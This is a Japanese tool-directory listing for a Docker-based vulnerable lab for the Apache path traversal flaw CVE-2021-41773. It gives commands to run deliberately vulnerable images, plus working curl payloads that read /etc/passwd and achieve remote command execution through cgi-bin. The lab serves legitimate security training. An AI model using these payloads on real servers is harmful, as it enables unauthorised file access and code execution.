Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773S — CVE-2021-41773 ApacheパストラバーサルのDockerベースの脆弱なラボ。制御された環境でのファイル読み取りとリモートコード実行のためのPoC構成を提供します。 | Kitploit
ツール/GitHubGitHub/mightysai1997/cve-2021-41773s
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

CVE-2021-41773 ApacheパストラバーサルのDockerベースの脆弱なラボ。制御された環境でのファイル読み取りとリモートコード実行のためのPoC構成を提供します。

リポジトリを見る
194年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41773 Apache パストラバーサル向けの脆弱な Docker イメージ

この脆弱性は、特定の非デフォルト設定を持つバージョン 2.4.49 にのみ影響します。特定の状況では、ファイル読み取りまたはコード実行につながる可能性があります。

tweet https://twitter.com/ptswarm/status/1445376079548624899

ファイル読み取りが可能な脆弱な設定

コンテナはDocker Hubから直接取得できます。

docker pull blueteamsteve/cve-2021-41773:no-cgid

そして次のコマンドで実行できます。

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Apacheのログは以下のコマンドで確認できます。あるいは、上記の実行コマンドから "-dit" を除外してstdioにストリーム出力することもできます。 docker logs <container-id>

ファイル読み取りのPoC

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

RCEが可能な脆弱な設定

コンテナはDocker Hubから直接取得できます。

docker pull blueteamsteve/cve-2021-41773:with-cgid

そして次のコマンドで実行できます。

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Apacheのログは以下のコマンドで確認できます。あるいは、上記の実行コマンドから "-dit" を除外してstdioにストリーム出力することもできます。 docker logs <container-id>

RCEのPoC

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

カスタムDockerコンテナのビルド

サブディレクトリ内のdockerfileとテンプレートのhttpd.confファイルを使用して、独自のバージョンを変更・ビルドしてください。

  • ファイル読み取りが可能な設定には ./no-cgi を使用します
  • コード実行が可能な設定には ./with-cgi を使用します
ツールをダウンロード